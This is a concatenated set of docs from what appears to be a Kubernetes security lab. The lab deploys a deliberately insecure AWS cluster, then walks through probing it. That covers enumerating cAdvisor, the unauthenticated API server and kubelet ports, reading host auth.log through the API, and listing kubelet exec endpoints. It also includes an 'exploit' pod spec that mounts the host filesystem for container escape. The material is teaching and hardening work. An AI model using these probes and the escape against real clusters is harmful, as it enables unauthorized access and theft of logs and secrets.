| { 80 | "name": "exploit", 81 | "image": "nginx:latest", 82 | "command": [ 83 | "/bin/bash" 84 | ], 85 | "args": [ 86 | "-c", 87 | "if [[ -f /status/done ]];then sleep infinity; else sleep 1; fi" 88 | ], 89 | "resources": {}, 90 | "volumeMounts": [ 91 | { 92 | "name": "escape-volume", 93 | "mountPath": "/rootfs", 94 | "subPath": "host" 95 | }, 96 | { 97 | "name": "status-volume", 98 | "mountPath": "/status" 99 | } 100 | ], 101 | "terminationMessagePath": "/dev/termination-log", 102 | "terminationMessagePolicy": "File", 103 | "imagePullPolicy": "Always", 104 | "securityContext": { 105 | "capabilities": { 106 | "drop": [ 107 | "CHOWN", 108 | "DAC_OVERRIDE", 109 | "FOWNER", 110 | "FSETID", 111 | "KILL", 112 | "SETGID", 113 | "SETUID", 114 | "SETPCAP", 115 | "NET_BIND_SERVICE", 116 | "NET_ADMIN", 117 | "NET_RAW", 118 | "MKNOD", 119 | "AUDIT_WRITE" 120 | ] 121 | }, 122 | "allowPrivilegeEscalation": false 123 | } 124 | } 125 | ], 126 | "restartPolicy": "Always", 127 | "terminationGracePeriodSeconds": 30, 128 | "dnsPolicy": "ClusterFirst", 129 | "nodeName": "ip-10-1-0-10", 130 | "securityContext": {}, 131 | "schedulerName": "default-scheduler" 132 | }, 133 | "status": { 134 | "phase": "Running", 135 | "conditions": [ 136 | { 137 | "type": "Initialized", 138 | "status": "True", 139 | "lastProbeTime": null, 140 | "lastTransitionTime": "2018-03-23T13:29:44Z" 141 | }, 142 | { 143 | "type": "Ready", 144 | "status": "True", 145 | "lastProbeTime": null, 146 | "lastTransitionTime": "2018-03-23T13:29:46Z" 147 | }, 148 | { 149 | "type": "PodScheduled", 150 | "status": "True", 151 | "lastProbeTime": null, 152 | "lastTransitionTime": "2018-03-23T13:29:44Z" 153 | } 154 | ], 155 | "hostIP": "10.1.0.10", 156 | "podIP": "10.2.0.39", 157 | "startTime": "2018-03-23T13:29:44Z", 158 | "containerStatuses": [ 159 | { 160 | "name": "exploit", 161 | "state": { 162 | "running": { 163 | "startedAt": "2018-03-23T13:29:45Z" 164 | } 165 | }, 166 | "lastState": {}, 167 | "ready": true, 168 | "restartCount": 0, 169 | "image": "nginx:latest", 170 | "imageID": "docker-pullable://nginx@sha256:c4ee0ecb376636258447e1d8effb56c09c75fe7acf756bf7c13efadf38aa0aca", 171 | "containerID": "docker://3f055bd81ff8d971d8392704efc3d8194895373bca1378194acc57e371626e72" 172 | }, 173 | { 174 | "name": "setup", 175 | "state": { 176 | "running": { 177 | "startedAt": "2018-03-23T13:29:45Z" 178 | } 179 | }, 180 | "lastState": {}, 181 | "ready": true, 182 | "restartCount": 0, 183 | "image": "nginx:latest", 184 | "imageID": "docker-pullable://nginx@sha256:c4ee0ecb376636258447e1d8effb56c09c75fe7acf756bf7c13efadf38aa0aca", 185 | "containerID": "docker://294d653161ac9e387b173c2cead5033c1e51800e6cea28116979e3442944783f" 186 | } 187 | ], 188 | "qosClass": "BestEffort" 189 | } 190 | }, 191 | { 192 | "metadata": { 193 | "name": "kubernetes-dashboard-5b575fd4c-77fqr", 194 | "generateName": "kubernetes-dashboard-5b575fd4c-", 195 | "namespace": "kube-system", 196 | "selfLink": "/api/v1/namespaces/kube-system/pods/kubernetes-dashboard-5b575fd4c-77fqr", 197 | "uid": "d60f089f-0a85-11e8-9462-06d7638bd978", 198 | "resourceVersion": "1813", 199 | "creationTimestamp": "2018-02-05T15:04:17Z", 200 | "labels": { 201 | "k8s-addon": "kubernetes-dashboard.addons.k8s.io", 202 | "k8s-app": "kubernetes-dashboard", 203 | "kubernetes.io/cluster-service": "true", 204 | "pod-template-hash": "161319807", 205 | "version": "v1.6.3" 206 | }, 207 | "annotations": { 208 | "kubernetes.io/config.seen": "2018-03-17T14:35:59.815512435Z", 209 | "kubernetes.io/config.source": "api", 210 | "scheduler.alpha.kubernetes.io/critical-pod": "", 211 | "scheduler.alpha.kubernetes.io/tolerations": "[{\"key\":\"CriticalAddonsOnly\", \"operator\":\"Exists\"}]" 212 | }, 213 | "ownerReferences": [ 214 | { 215 | "apiVersion": "extensions/v1beta1", 216 | "kind": "ReplicaSet", 217 | "name": "kubernetes-dashboard-5b575fd4c", 218 | "uid": "d60dcfa3-0a85-11e8-9462-06d7638bd978", 219 | "controller": true, 220 | "blockOwnerDeletion": true 221 | } 222 | ] 223 | }, 224 | "spec": { 225 | "containers": [ 226 | { 227 | "name": "kubernetes-dashboard", 228 | "image": "gcr.io/google_containers/kubernetes-dashboard-amd64:v1.6.3", 229 | "args": [ 230 | "--apiserver-host=http://10.1.0.10:8080" 231 | ], 232 | "ports": [ 233 | { 234 | "containerPort": 9090, 235 | "protocol": "TCP" 236 | } 237 | ], 238 | "resources": { 239 | "limits": { 240 | "cpu": "100m", 241 | "memory": "50Mi" 242 | }, 243 | "requests": { 244 | "cpu": "100m", 245 | "memory": "50Mi" 246 | } 247 | }, 248 | "livenessProbe": { 249 | "httpGet": { 250 | "path": "/", 251 | "port": 9090, 252 | "scheme": "HTTP" 253 | }, 254 | "initialDelaySeconds": 30, 255 | "timeoutSeconds": 30, 256 | "periodSeconds": 10, 257 | "successThreshold": 1, 258 | "failureThreshold": 3 259 | }, 260 | "terminationMessagePath": "/dev/termination-log", 261 | "terminationMessagePolicy": "File", 262 | "imagePullPolicy": "IfNotPresent" 263 | } 264 | ], 265 | "restartPolicy": "Always", 266 | "terminationGracePeriodSeconds": 30, 267 | "dnsPolicy": "ClusterFirst", 268 | "serviceAccountName": "kubernetes-dashboard", 269 | "serviceAccount": "kubernetes-dashboard", 270 | "nodeName": "ip-10-1-0-10", 271 | "securityContext": {}, 272 | "schedulerName": "default-scheduler", 273 | "tolerations": [ 274 | { 275 | "key": "node-role.kubernetes.io/master", 276 | "effect": "NoSchedule" 277 | } 278 | ] 279 | }, 280 | "status": { 281 | "phase": "Running", 282 | "conditions": [ 283 | { 284 | "type": "Initialized", 285 | "status": "True", 286 | "lastProbeTime": null, 287 | "lastTransitionTime": "2018-02-05T15:04:17Z" 288 | }, 289 | { 290 | "type": "Ready", 291 | "status": "True", 292 | "lastProbeTime": null, 293 | "lastTransitionTime": "2018-03-17T14:36:01Z" 294 | }, 295 | { 296 | "type": "PodScheduled", 297 | "status": "True", 298 | "lastProbeTime": null, 299 | "lastTransitionTime": "2018-02-05T15:04:17Z" 300 | } 301 | ], 302 | "hostIP": "10.1.0.10", 303 | "podIP": "10.2.0.4", 304 | "startTime": "2018-02-05T15:04:17Z", 305 | "containerStatuses": [ 306 | { 307 | "name": "kubernetes-dashboard", 308 | "state": { 309 | "running": { 310 | "startedAt": "2018-03-17T14:36:01Z" 311 | } 312 | }, 313 | "lastState": { 314 | "terminated": { 315 | "exitCode": 2, 316 | "reason": "Error", 317 | "startedAt": "2018-02-05T15:08:16Z", 318 | "finishedAt": "2018-02-05T15:32:50Z", 319 | "containerID": "docker://15d44b7d87a258a0d18c38ec64f4129169d5ae568d1b3384a22e09256d7a0483" 320 | } 321 | }, 322 | "ready": true, 323 | "restartCount": 3, 324 | "image": "gcr.io/google_containers/kubernetes-dashboard-amd64:v1.6.3", 325 | "imageID": "docker-pullable://gcr.io/google_containers/kubernetes-dashboard-amd64@sha256:2c4421ed80358a0ee97b44357b6cd6dc09be6ccc27dfe9d50c9bfc39a760e5fe", 326 | "containerID": "docker://a3c7cd6d8e0ebf603b431604ab7a1844f8ed0b651b231b10849010fd7cf37b17" 327 | } 328 | ], 329 | "qosClass": "Guaranteed" 330 | } 331 | } 332 | ] 333 | } 334 | 335 | ``` 336 | 337 | -------------------------------------------------------------------------------- /docs/cmd/kubelet-spec.md: -------------------------------------------------------------------------------- 1 | [Back](/docs/direct-controller.md) 2 | 3 | ``` 4 | { 5 | "num_cores": 1, 6 | "cpu_frequency_khz": 2400088, 7 | "memory_capacity": 2095865856, 8 | "hugepages": [ 9 | { 10 | "page_size": 2048, 11 | "num_pages": 0 12 | } 13 | ], 14 | "machine_id": "9388fcdf27304278a02f83a9c2d5333d", 15 | "system_uuid": "EC2826BA-6C3E-72DF-F19A-D389212A0C7D", 16 | "boot_id": "57596319-1c3e-4bb9-9514-97e9a9ccede6", 17 | "filesystems": [ 18 | { 19 | "device": "/dev/xvda1", 20 | "capacity": 33240739840, 21 | "type": "vfs", 22 | "inodes": 4096000, 23 | "has_inodes": true 24 | }, 25 | { 26 | "device": "tmpfs", 27 | "capacity": 209588224, 28 | "type": "vfs", 29 | "inodes": 255843, 30 | "has_inodes": true 31 | } 32 | ], 33 | "disk_map": { 34 | "202:0": { 35 | "name": "xvda", 36 | "major": 202, 37 | "minor": 0, 38 | "size": 34359738368, 39 | "scheduler": "none" 40 | } 41 | }, 42 | "network_devices": [ 43 | { 44 | "name": "eth0", 45 | "mac_address": "06:d7:63:8b:d9:78", 46 | "speed": 0, 47 | "mtu": 9001 48 | } 49 | ], 50 | "topology": [ 51 | { 52 | "node_id": 0, 53 | "memory": 2095865856, 54 | "cores": [ 55 | { 56 | "core_id": 0, 57 | "thread_ids": [ 58 | 0 59 | ], 60 | "caches": [ 61 | { 62 | "size": 32768, 63 | "type": "Data", 64 | "level": 1 65 | }, 66 | { 67 | "size": 32768, 68 | "type": "Instruction", 69 | "level": 1 70 | }, 71 | { 72 | "size": 262144, 73 | "type": "Unified", 74 | "level": 2 75 | } 76 | ] 77 | } 78 | ], 79 | "caches": [ 80 | { 81 | "size": 31457280, 82 | "type": "Unified", 83 | "level": 3 84 | } 85 | ] 86 | } 87 | ], 88 | "cloud_provider": "AWS", 89 | "instance_type": "t2.small", 90 | "instance_id": "i-05bb925bb00bf3bcc" 91 | } 92 | ``` 93 | 94 | -------------------------------------------------------------------------------- /docs/create-kubeconfig.md: -------------------------------------------------------------------------------- 1 | # Create the local ```kubeconfig``` file 2 | 3 | 4 | From the same installation system shell, obtain the controller system IP 5 | ``` 6 | $ CONTROLLER_IP=$(aws ec2 describe-instances \ 7 | --region ${AWS_DEFAULT_REGION} \ 8 | --filter 'Name=tag:Name,Values=controller' \ 9 | --query 'Reservations[].Instances[].NetworkInterfaces[0].Association.PublicIp' \ 10 | --output text) 11 | ``` 12 | 13 | Create the ```kubeconfig``` file locally 14 | ``` 15 | $ cat > kubeconfig < 9m v1.9.2 46 | ip-10-1-0-11 Ready 6m v1.9.2 47 | ip-10-1-0-12 Ready 1m v1.9.2 48 | ``` 49 | 50 | [Back](/README.md#build-the-cluster) | [Next](deploy-kube-dns.md) 51 | -------------------------------------------------------------------------------- /docs/create-vpc.md: -------------------------------------------------------------------------------- 1 | # Launch and Configure the VPC 2 | 3 | ## Cloudformation Template 4 | 5 | From inside the repo directory on your installation system, set a few environment variables. Note: You will need the AMI for your region to be correct. See: [Ubuntu 16.0.4 LTS](http://cloud-images.ubuntu.com/locator/ec2/) and search for '16.04 LTS hvm:ebs-ssd' 6 | ``` 7 | $ export STACK_NAME="hkfs" 8 | export AWS_DEFAULT_REGION="us-east-1" 9 | export KEY_NAME="hkfs" 10 | export IMAGE_ID="ami-66506c1c" 11 | ``` 12 | 13 | Deploy the Cloudformation template to create the VPC, subnet, route table, route table association, and internet gateway. 14 | ``` 15 | $ aws cloudformation create-stack --region ${AWS_DEFAULT_REGION} --stack-name ${STACK_NAME} \ 16 | --template-body file://templates/${STACK_NAME}.json --output text 17 | ``` 18 | 19 | Obtain the VPC Id 20 | ``` 21 | $ VPC_ID="$(aws cloudformation describe-stacks --region ${AWS_DEFAULT_REGION} \ 22 | --query 'Stacks[*].Outputs[?OutputKey==`VPCId`].OutputValue[]' \ 23 | --stack-name ${STACK_NAME} --output text)" 24 | $ echo "${VPC_ID}" 25 | ``` 26 | 27 | Obtain the Security Group Id 28 | ``` 29 | $ SG_ID="$(aws ec2 describe-security-groups --query 'SecurityGroups[*].GroupId' \ 30 | --region ${AWS_DEFAULT_REGION} --filter "Name=vpc-id,Values=${VPC_ID}" --output text)" 31 | $ echo "${SG_ID}" 32 | ``` 33 | 34 | Obtain the Subnet Id 35 | ``` 36 | $ SUBNET_ID="$(aws ec2 describe-subnets --region ${AWS_DEFAULT_REGION} \ 37 | --filter "Name=tag:Name,Values=${STACK_NAME}-subnet" --query 'Subnets[*].SubnetId' \ 38 | --output text)" 39 | $ echo "${SUBNET_ID}" 40 | ``` 41 | 42 | Allow just one IP to access the cluster instances. 43 | ``` 44 | $ aws ec2 authorize-security-group-ingress --region ${AWS_DEFAULT_REGION} --group-id ${SG_ID} \ 45 | --protocol all --port 0 --cidr $(dig +short myip.opendns.com @resolver1.opendns.com)/32 46 | ``` 47 | 48 | Create a new SSH keypair 49 | ``` 50 | $ aws ec2 create-key-pair --region ${AWS_DEFAULT_REGION} --key-name ${KEY_NAME} \ 51 | --query 'KeyMaterial' --output text > ${KEY_NAME}.pem 52 | $ chmod 600 ${KEY_NAME}.pem 53 | ``` 54 | 55 | [Back](/README.md#build-the-cluster) | [Next](launch-configure-etcd.md) 56 | -------------------------------------------------------------------------------- /docs/delete-instances.md: -------------------------------------------------------------------------------- 1 | # Delete Instances 2 | 3 | ## ```worker-1``` and ```worker-2``` Deletion 4 | 5 | Set some ENV variables 6 | ``` 7 | $ export AWS_DEFAULT_REGION="us-east-1" 8 | $ export KEY_NAME="hkfs" 9 | ``` 10 | 11 | Obtain the Worker Instance IDs 12 | ``` 13 | $ INSTANCE1_ID="$(aws ec2 describe-instances 14 | --region ${AWS_DEFAULT_REGION} 15 | --filter 'Name=tag:Name,Values=worker-1' 16 | --query 'Reservations[].Instances[].InstanceId' 17 | --output text)" 18 | $ INSTANCE2_ID="$(aws ec2 describe-instances 19 | --region ${AWS_DEFAULT_REGION} 20 | --filter 'Name=tag:Name,Values=worker-2' 21 | --query 'Reservations[].Instances[].InstanceId' 22 | --output text)" 23 | ``` 24 | 25 | Terminate ```worker-1``` and ```worker-2``` 26 | ``` 27 | $ aws ec2 terminate-instances \ 28 | --region ${AWS_DEFAULT_REGION} \ 29 | --instance-ids ${INSTANCE1_ID} 30 | $ aws ec2 terminate-instances \ 31 | --region ${AWS_DEFAULT_REGION} 32 | --instance-ids ${INSTANCE2_ID} 33 | ``` 34 | 35 | ## ```controller``` Deletion 36 | 37 | Obtain the ```controller``` Instance ID and Terminate 38 | ``` 39 | $ INSTANCEM_ID="$(aws ec2 describe-instances \ 40 | --region ${AWS_DEFAULT_REGION} \ 41 | --filter 'Name=tag:Name,Values=controller' \ 42 | --query 'Reservations[].Instances[].InstanceId' \ 43 | --output text)" 44 | $ aws ec2 terminate-instances \ 45 | --region ${AWS_DEFAULT_REGION} \ 46 | --instance-ids ${INSTANCEM_ID} 47 | ``` 48 | 49 | ## ```etcd``` Deletion 50 | 51 | Obtain the ```etcd``` Instance ID and Terminate 52 | 53 | ``` 54 | $ INSTANCEE_ID="$(aws ec2 describe-instances \ 55 | --region ${AWS_DEFAULT_REGION} \ 56 | --filter 'Name=tag:Name,Values=etcd' \ 57 | --query 'Reservations[].Instances[].InstanceId' \ 58 | --output text)" 59 | $ aws ec2 terminate-instances \ 60 | --region ${AWS_DEFAULT_REGION} \ 61 | --instance-ids ${INSTANCEE_ID} 62 | ``` 63 | 64 | SSH Keypair Deletion 65 | ``` 66 | $ aws ec2 delete-key-pair --region ${AWS_DEFAULT_REGION} --key-name "${KEY_NAME}" 67 | ``` 68 | 69 | [Back](/README.md) | [Next](delete-vpc.md) 70 | -------------------------------------------------------------------------------- /docs/delete-vpc.md: -------------------------------------------------------------------------------- 1 | # Delete VPC 2 | 3 | Set some ENV variables 4 | ``` 5 | $ export AWS_DEFAULT_REGION="us-east-1" 6 | $ export STACK_NAME="hkfs" 7 | ``` 8 | 9 | Destroy the VPC via Cloudformation stack deletion 10 | ``` 11 | $ aws cloudformation delete-stack --region ${AWS_DEFAULT_REGION} --stack-name ${STACK_NAME} 12 | ``` 13 | 14 | [Back](/README.md) 15 | -------------------------------------------------------------------------------- /docs/deploy-basic-dashboard.md: -------------------------------------------------------------------------------- 1 | # Deploy the Kubernetes Dashboard 2 | 3 | From the same installation system shell, create the ```basic-dashboard.yml``` Definition 4 | 5 | ``` 6 | $ cat > basic-dashboard.yml < 9090 102 | ``` 103 | 104 | In a browser, visit: 105 | ``` 106 | http://localhost:8000 107 | ``` 108 | 109 | [Back](/README.md#level-0-security) | [Next](enumerate-ports.md) 110 | -------------------------------------------------------------------------------- /docs/deploy-heapster.md: -------------------------------------------------------------------------------- 1 | # Deploy Heapster 2 | 3 | From the same installation system shell, create the ```kube-dns.yml``` Definition 4 | 5 | ``` 6 | $ cat > heapster.yml < kube-dns.yml < azure-vote.yml <Temporary Redirect. 49 | ``` 50 | Navigate to it using a browser: 51 | ``` 52 | $ open http://$CONTROLLERIP:4194/containers/ 53 | ``` 54 | Hit `tcp/4194` on the Prometheus formatted `/metrics` endpoint: 55 | 56 | [```$ curl $CONTROLLERIP:4194/metrics```](cmd/cadvisor-metrics.md) 57 | 58 | As you can see, there are many pieces of information that describe the infrastructure that should not be exposed to an attacker. 59 | 60 | From the `/containers/` endpoint: 61 | 62 | - How many CPU shares and how much RAM is available on this node. 63 | - How much CPU/RAM/Disk/FS is in use, and that usage over time. 64 | - A full process listing complete with base process name, PID, UID, GID, CPU usage, Memory usage, and time running. 65 | 66 | From the `/metrics` endpoint: 67 | 68 | - Useful information about the Host OS and container runtime: 69 | 70 | ``` 71 | cadvisor_version_info{cadvisorRevision="",cadvisorVersion="",dockerVersion="1.13.1",kernelVersion="4.4.0-1049-aws",osVersion="Ubuntu 16.04.3 LTS"} 1 72 | ``` 73 | 74 | - When a container was created/started. In this case: `Saturday, March 17, 2018 2:36:01 PM` 75 | 76 | ``` 77 | container_start_time_seconds{container_name="kubernetes-dashboard",id="/kubepods/podd60f089f-0a85-11e8-9462-06d7638bd978/a3c7cd6d8e0ebf603b431604ab7a1844f8ed0b651b231b10849010fd7cf37b17",image="gcr.io/google_containers/kubernetes-dashboard-amd64@sha256:2c4421ed80358a0ee97b44357b6cd6dc09be6ccc27dfe9d50c9bfc39a760e5fe",name="k8s_kubernetes-dashboard_kubernetes-dashboard-5b575fd4c-77fqr_kube-system_d60f089f-0a85-11e8-9462-06d7638bd978_3",namespace="kube-system",pod_name="kubernetes-dashboard-5b575fd4c-77fqr"} 1.521297361e+09 78 | ``` 79 | 80 | 81 | - A full listing of the containers running on this host plus a lot of metadata about each one. For example, this single metric from one pod offers: 82 | 83 | ``` 84 | ...snip... 85 | container_cpu_load_average_10s{container_name="kubernetes-dashboard",id="/kubepods/podd60f089f-0a85-11e8-9462-06d7638bd978/a3c7cd6d8e0ebf603b431604ab7a1844f8ed0b651b231b10849010fd7cf37b17",image="gcr.io/google_containers/kubernetes-dashboard-amd64@sha256:2c4421ed80358a0ee97b44357b6cd6dc09be6ccc27dfe9d50c9bfc39a760e5fe",name="k8s_kubernetes-dashboard_kubernetes-dashboard-5b575fd4c-77fqr_kube-system_d60f089f-0a85-11e8-9462-06d7638bd978_3",namespace="kube-system",pod_name="kubernetes-dashboard-5b575fd4c-77fqr"} 0 86 | ...snip... 87 | ``` 88 | 89 | - Container name: `kubernetes-dashboard` 90 | - Namespace: `kube-system` 91 | - Image: `gcr.io/google_containers/kubernetes-dashboard-amd64` 92 | - Image Version/Hash: `sha256:2c4421ed80358a0ee97b44357b6cd6dc09be6ccc27dfe9d50c9bfc39a760e5fe` 93 | - Pod name: `kubernetes-dashboard-5b575fd4c-77fqr` 94 | - Kubernetes Deployment UID: `d60f089f-0a85-11e8-9462-06d7638bd978` 95 | - Runtime (Docker) Container ID: `a3c7cd6d8e0ebf603b431604ab7a1844f8ed0b651b231b10849010fd7cf37b17` 96 | 97 | Using just this information from cAdvisor, it's possible to gather a tremendous amount of information about the node's Host OS, the Network interface names, the CPU/RAM/Net/Disk utilization (over time), the processes running, and how long they've been running. What a helpful service! 98 | 99 | ### Probe the "Insecure" `Kubernetes API` service: 100 | 101 | Verify the port is responding: 102 | ``` 103 | $ nc -vz $CONTROLLERIP 8080 104 | Connection to 54.89.108.72 port 8080 [tcp/http-alt] succeeded! 105 | ``` 106 | 107 | Curl the API Server directly: 108 | ``` 109 | $ $ curl $CONTROLLERIP:8080 110 | { 111 | "paths": [ 112 | "/api", 113 | "/api/v1", 114 | "/apis", 115 | "/apis/", 116 | "/apis/admissionregistration.k8s.io", 117 | "/apis/admissionregistration.k8s.io/v1beta1", 118 | "/apis/apiextensions.k8s.io", 119 | "/apis/apiextensions.k8s.io/v1beta1", 120 | "/apis/apiregistration.k8s.io", 121 | "/apis/apiregistration.k8s.io/v1beta1", 122 | "/apis/apps", 123 | "/apis/apps/v1", 124 | "/apis/apps/v1beta1", 125 | "/apis/apps/v1beta2", 126 | "/apis/authentication.k8s.io", 127 | "/apis/authentication.k8s.io/v1", 128 | "/apis/authentication.k8s.io/v1beta1", 129 | "/apis/authorization.k8s.io", 130 | "/apis/authorization.k8s.io/v1", 131 | "/apis/authorization.k8s.io/v1beta1", 132 | "/apis/autoscaling", 133 | "/apis/autoscaling/v1", 134 | "/apis/autoscaling/v2beta1", 135 | "/apis/batch", 136 | "/apis/batch/v1", 137 | "/apis/batch/v1beta1", 138 | "/apis/certificates.k8s.io", 139 | "/apis/certificates.k8s.io/v1beta1", 140 | "/apis/events.k8s.io", 141 | "/apis/events.k8s.io/v1beta1", 142 | "/apis/extensions", 143 | "/apis/extensions/v1beta1", 144 | "/apis/networking.k8s.io", 145 | "/apis/networking.k8s.io/v1", 146 | "/apis/policy", 147 | "/apis/policy/v1beta1", 148 | "/apis/rbac.authorization.k8s.io", 149 | "/apis/rbac.authorization.k8s.io/v1", 150 | "/apis/rbac.authorization.k8s.io/v1beta1", 151 | "/apis/storage.k8s.io", 152 | "/apis/storage.k8s.io/v1", 153 | "/apis/storage.k8s.io/v1beta1", 154 | "/healthz", 155 | "/healthz/autoregister-completion", 156 | "/healthz/etcd", 157 | "/healthz/ping", 158 | "/healthz/poststarthook/apiservice-openapi-controller", 159 | "/healthz/poststarthook/apiservice-registration-controller", 160 | "/healthz/poststarthook/apiservice-status-available-controller", 161 | "/healthz/poststarthook/bootstrap-controller", 162 | "/healthz/poststarthook/ca-registration", 163 | "/healthz/poststarthook/generic-apiserver-start-informers", 164 | "/healthz/poststarthook/kube-apiserver-autoregistration", 165 | "/healthz/poststarthook/start-apiextensions-controllers", 166 | "/healthz/poststarthook/start-apiextensions-informers", 167 | "/healthz/poststarthook/start-kube-aggregator-informers", 168 | "/healthz/poststarthook/start-kube-apiserver-informers", 169 | "/logs", 170 | "/metrics", 171 | "/swagger-2.0.0.json", 172 | "/swagger-2.0.0.pb-v1", 173 | "/swagger-2.0.0.pb-v1.gz", 174 | "/swagger.json", 175 | "/swaggerapi", 176 | "/ui", 177 | "/ui/", 178 | "/version" 179 | ] 180 | } 181 | ``` 182 | Because the unencrypted request was successful and the list of available endpoints came back, it means we have full access to the API server and can get/update/delete any information stored inside the cluster. 183 | 184 | Obtain the version of the Kubernetes API Server: 185 | ``` 186 | $ curl $CONTROLLERIP:8080/version 187 | { 188 | "major": "1", 189 | "minor": "9", 190 | "gitVersion": "v1.9.2", 191 | "gitCommit": "5fa2db2bd46ac79e5e00a4e6ed24191080aa463b", 192 | "gitTreeState": "clean", 193 | "buildDate": "2018-01-18T09:42:01Z", 194 | "goVersion": "go1.9.2", 195 | "compiler": "gc", 196 | "platform": "linux/amd64" 197 | } 198 | ``` 199 | 200 | List the services available via the API's built-in `/ui` proxy: 201 | ``` 202 | $ curl $CONTROLLERIP:8080/ui/ 203 | Temporary Redirect. 204 | ``` 205 | Because we have sufficient access to the cluster API, visiting this URL will likely result in the ability to access the Kubernetes dashboard in this cluster. 206 | 207 | Obtain logs from containers, pods, and system logging endpoints on the underlying host: 208 | ``` 209 | $ curl $CONTROLLERIP:8080/logs/ 210 |
211 | apt/
212 | auth.log
213 | auth.log.1
214 | auth.log.2.gz
215 | auth.log.3.gz
216 | btmp
217 | btmp.1
218 | cloud-init-output.log
219 | cloud-init.log
220 | containers/
221 | dist-upgrade/
222 | dpkg.log
223 | dpkg.log.1
224 | fsck/
225 | kern.log
226 | kern.log.1
227 | lastlog
228 | lxd/
229 | pods/
230 | syslog
231 | syslog.1
232 | syslog.2.gz
233 | syslog.3.gz
234 | syslog.4.gz
235 | syslog.5.gz
236 | syslog.6.gz
237 | syslog.7.gz
238 | unattended-upgrades/
239 | wtmp
240 | wtmp.1
241 | 
242 | ``` 243 | 244 | View, for example, the host `auth.log`: 245 | ``` 246 | $ curl $CONTROLLERIP:8080/logs/auth.log 247 | ...snip... 248 | Apr 10 02:17:01 ip-10-1-0-10 CRON[1571]: pam_unix(cron:session): session opened for user root by (uid=0) 249 | Apr 10 02:17:01 ip-10-1-0-10 CRON[1571]: pam_unix(cron:session): session closed for user root 250 | Apr 10 02:20:53 ip-10-1-0-10 sudo: pam_unix(sudo:session): session closed for user root 251 | Apr 10 02:20:54 ip-10-1-0-10 sshd[32757]: Received disconnect from x.x.x.x port 55139:11: disconnected by user 252 | Apr 10 02:20:54 ip-10-1-0-10 sshd[32757]: Disconnected from x.x.x.x port 55139 253 | Apr 10 02:20:54 ip-10-1-0-10 sshd[32718]: pam_unix(sshd:session): session closed for user ubuntu 254 | Apr 10 02:20:54 ip-10-1-0-10 systemd-logind[1231]: Removed session 630. 255 | Apr 10 02:20:54 ip-10-1-0-10 systemd: pam_unix(systemd-user:session): session closed for user ubuntu 256 | ``` 257 | 258 | View the `kubernetes-dashboard` pod logs: 259 | ``` 260 | $ curl $CONTROLLERIP:8080/logs/pods/d60f089f-0a85-11e8-9462-06d7638bd978/kubernetes-dashboard_2.log 261 | ...snip... 262 | {"log":"Using apiserver-host location: http://10.1.0.10:8080\n","stream":"stdout","time":"2018-02-05T15:08:17.444915083Z"} 263 | {"log":"Skipping in-cluster config\n","stream":"stdout","time":"2018-02-05T15:08:17.444920926Z"} 264 | {"log":"Using random key for csrf signing\n","stream":"stdout","time":"2018-02-05T15:08:17.444923968Z"} 265 | {"log":"No request provided. Skipping authorization header\n","stream":"stdout","time":"2018-02-05T15:08:17.44492672Z"} 266 | {"log":"Successful initial request to the apiserver, version: v1.9.2\n","stream":"stdout","time":"2018-02-05T15:08:17.44887775Z"} 267 | ``` 268 | 269 | Mimic the `kubectl get pods` command: 270 | ``` 271 | $ curl $CONTROLLERIP:8080/api/v1/namespaces/default/pods?limit=500 272 | { 273 | "kind": "PodList", 274 | "apiVersion": "v1", 275 | "metadata": { 276 | "selfLink": "/api/v1/namespaces/default/pods", 277 | "resourceVersion": "1633976" 278 | }, 279 | "items": [ 280 | { 281 | "metadata": { 282 | "name": "subpath", 283 | "namespace": "default", 284 | "selfLink": "/api/v1/namespaces/default/pods/subpath", 285 | "uid": "3fb02fa6-2e9e-11e8-9d04-06d7638bd978", 286 | "resourceVersion": "418041", 287 | "creationTimestamp": "2018-03-23T13:29:44Z" 288 | }, 289 | "spec": { 290 | "volumes": [ 291 | ...snip... 292 | ``` 293 | 294 | While not terribly practical, it is possible to interact with the API using `curl` as shown above. However, having the `kubectl` binary makes things much more user-friendly. 295 | 296 | ### Probe the `Kubelet Healthz` service: 297 | 298 | Verify the port is responding: 299 | ``` 300 | $ nc -vz $CONTROLLERIP 10248 301 | nc: connectx to 54.89.108.72 port 10248 (tcp) failed: Connection refused 302 | ``` 303 | 304 | It's only running on the `localhost` address: 305 | ``` 306 | $ ssh -i ${KEY_NAME}.pem ubuntu@$CONTROLLERIP 307 | ubuntu@ip-10-1-0-10:~$ curl localhost:10248/ 308 | 404 page not found 309 | ubuntu@ip-10-1-0-10:~$ curl localhost:10248/healthz 310 | ok 311 | ``` 312 | 313 | ### Probe the `Kube-Proxy Metrics` service: 314 | 315 | Verify the port is responding: 316 | ``` 317 | $ nc -vz $CONTROLLERIP 10249 318 | nc: connectx to 54.89.108.72 port 10249 (tcp) failed: Connection refused 319 | ``` 320 | 321 | It's only running on the `localhost` address: 322 | ``` 323 | $ ssh -i ${KEY_NAME}.pem ubuntu@$CONTROLLERIP 324 | ubuntu@ip-10-1-0-10:~$ curl localhost:10249/healthz 325 | ok 326 | ubuntu@ip-10-1-0-10:~$ curl localhost:10249/metrics 327 | ``` 328 | 329 | ```ubuntu@ip-10-1-0-10:~$``` [```curl localhost:10249/metrics ```](cmd/kube-proxy-metrics.md) 330 | 331 | It can tell us how `kube-proxy` reaches the API server on `10.1.0.10:8080` without encryption necessary. 332 | 333 | ### Probe the `Kubelet Read/Write` service: 334 | 335 | Verify the port is responding: 336 | ``` 337 | $ nc -vz $CONTROLLERIP 10250 338 | Connection to 54.89.108.72 port 10250 [tcp/*] succeeded! 339 | ``` 340 | 341 | Hit `tcp/10250` via curl: 342 | 343 | ``` 344 | $ curl $CONTROLLERIP:10250 345 | 346 | $ curl -sk https://$CONTROLLERIP:10250 347 | 404 page not found 348 | ``` 349 | 350 | The lack of an authn/authz error means this port is unprotected, and it provides an extremely useful attack path to leverage the `kubelet` to have remote command execution inside nearly any pod/container, access to any pod log on that system, and access to any secret available to that node at a minimum. 351 | 352 | So, the Kubelet is always listening on a TLS port, but by default, it's not authenticating or authorizing access to it. The `-s` is to be "silent" and the `-k` tells curl to allow connections without certificates. 353 | 354 | According to the source code, the following endpoints are available on both the Kubelet "read-only" API and "read/write" API: 355 | 356 | - `/metrics` 357 | - `/metrics/cadvisor` 358 | - `/spec/` 359 | - `/stats/` 360 | 361 | The following endpoints are only available on the Kubelet's "read/write" API: 362 | - `/logs/` - Get logs from a pod/container. 363 | - `/run/` - Alias for `/exec/` 364 | - `/exec/` - Exec a command in a running container 365 | - `/attach/` - Attach to the `stdout` of a running container 366 | - `/portForward/` - Forward a port directly to a container 367 | - `/containerLogs/` - Get logs from a 